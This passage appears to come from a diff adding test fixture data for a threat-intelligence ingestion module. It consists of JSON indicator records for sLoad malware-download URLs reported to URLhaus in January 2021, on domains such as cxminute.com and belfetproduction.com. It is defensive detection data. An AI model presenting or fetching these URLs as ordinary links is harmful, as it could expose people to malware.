"threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:44.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://cxminute.com/minu/12875710159/blank.css", + "threatintel.indicator.url.path": "/minu/12875710159/blank.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961489/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 21070, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:41.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "gif", + "threatintel.indicator.url.original": "https://cxminute.com/minu/CPNLNZ65M20A200N/maps.gif", + "threatintel.indicator.url.path": "/minu/CPNLNZ65M20A200N/maps.gif", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961488/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 21442, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "belfetproduction.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:40.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "belfetproduction.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://belfetproduction.com/bella/DLPCMN64D02D789E/logo.png", + "threatintel.indicator.url.path": "/bella/DLPCMN64D02D789E/logo.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961487/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 21831, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "belfetproduction.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:17.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "belfetproduction.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://belfetproduction.com/bella/01844510469/1x1.jpg", + "threatintel.indicator.url.path": "/bella/01844510469/1x1.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961485/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 22214, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "ladiesincode.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:16.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "ladiesincode.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://ladiesincode.com/ladi/FRRDNI52M71E522D/logo.css", + "threatintel.indicator.url.path": "/ladi/FRRDNI52M71E522D/logo.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961486/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 22594, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "letonguesc.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:16.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "letonguesc.com", + "threatintel.indicator.url.extension": "gif", + "threatintel.indicator.url.original": "https://letonguesc.com/leto/CPPMRC65E04H980Q/it.gif", + "threatintel.indicator.url.path": "/leto/CPPMRC65E04H980Q/it.gif", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961482/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 22968, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:15.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://univirtek.com/viro/06389650018/it.css", + "threatintel.indicator.url.path": "/viro/06389650018/it.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961483/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 23335, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "belfetproduction.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:15.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "belfetproduction.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://belfetproduction.com/bella/CRSRRT61E15H501H/logo.png", + "threatintel.indicator.url.path": "/bella/CRSRRT61E15H501H/logo.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961484/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 23724, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:15.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://cxminute.com/minu/SMPMSM67P05F205U/it.jpg", + "threatintel.indicator.url.path": "/minu/SMPMSM67P05F205U/it.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961480/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 24094, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:13.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://univirtek.com/viro/SBNPQL78A24A783E/uk.png", + "threatintel.indicator.url.path": "/viro/SBNPQL78A24A783E/uk.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961481/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 24466, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:13.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://cxminute.com/minu/15578761007/maps.jpg", + "threatintel.indicator.url.path": "/minu/15578761007/maps.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961478/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 24833, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:10.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://univirtek.com/viro/03079590133/1x1.png", + "threatintel.indicator.url.path": "/viro/03079590133/1x1.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961479/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 25201, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "ladiesincode.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:10.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "ladiesincode.com", + "threatintel.indicator.url.extension": "gif", + "threatintel.indicator.url.original": "https://ladiesincode.com/ladi/BNCLNR77T56M082U/it.gif", + "threatintel.indicator.url.path": "/ladi/BNCLNR77T56M082U/it.gif", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961476/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 25579, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:45.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://cxminute.com/minu/JNKMTJ64B29L424O/uk.css", + "threatintel.indicator.url.path": "/minu/JNKMTJ64B29L424O/uk.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961477/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 25949, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "belfetproduction.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:45.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "belfetproduction.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://belfetproduction.com/bella/PGNMRA64S22I608Z/en.png", + "threatintel.indicator.url.path": "/bella/PGNMRA64S22I608Z/en.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961470/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 26336, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:43.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://cxminute.com/minu/RZKDRD77T23Z229T/logo.jpg", + "threatintel.indicator.url.path": "/minu/RZKDRD77T23Z229T/logo.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961471/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 26708, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "fhivelifestyle.online", + "threatintel.indicator.first_seen": "2021-01-14T20:50:43.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "fhivelifestyle.online", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://fhivelifestyle.online/nhbrwvdffsgt/adf/maps.jpg", + "threatintel.indicator.url.path": "/nhbrwvdffsgt/adf/maps.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961472/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 27093, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "belfetproduction.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:43.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "belfetproduction.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://belfetproduction.com/bella/05739900487/1x1.css", + "threatintel.indicator.url.path": "/bella/05739900487/1x1.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961473/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 27476, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "belfetproduction.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:43.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "belfetproduction.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://belfetproduction.com/bella/01767180597/map.css", + "threatintel.indicator.url.path": "/bella/01767180597/map.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961474/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 27859, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "belfetproduction.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:43.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "belfetproduction.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://belfetproduction.com/bella/BRNGRG55D21F394K/map.css", + "threatintel.indicator.url.path": "/bella/BRNGRG55D21F394K/map.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961475/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 28247, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:43.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://cxminute.com/minu/DLLTZN67L20L157J/1x1.css", + "threatintel.indicator.url.path": "/minu/DLLTZN67L20L157J/1x1.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961468/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 28618, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:38.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://cxminute.com/minu/08035410722/logo.jpg", + "threatintel.indicator.url.path": "/minu/08035410722/logo.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961469/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 28985, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:38.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://univirtek.com/viro/GRNZEI60M13G346L/en.css", + "threatintel.indicator.url.path": "/viro/GRNZEI60M13G346L/en.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961467/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 29357, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "letonguesc.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:13.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "letonguesc.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://letonguesc.com/leto/03253350239/1x1.png", + "threatintel.indicator.url.path": "/leto/03253350239/1x1.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961464/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 29727, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "ladiesincode.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:09.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "ladiesincode.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://ladiesincode.com/ladi/10582470158/uk.css", + "threatintel.indicator.url.path": "/ladi/10582470158/uk.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961465/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 30100, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "ladiesincode.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:09.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "ladiesincode.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://ladiesincode.com/ladi/BTTLNZ68A56D325C/map.css", + "threatintel.indicator.url.path": "/ladi/BTTLNZ68A56D325C/map.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961466/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 30479, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": 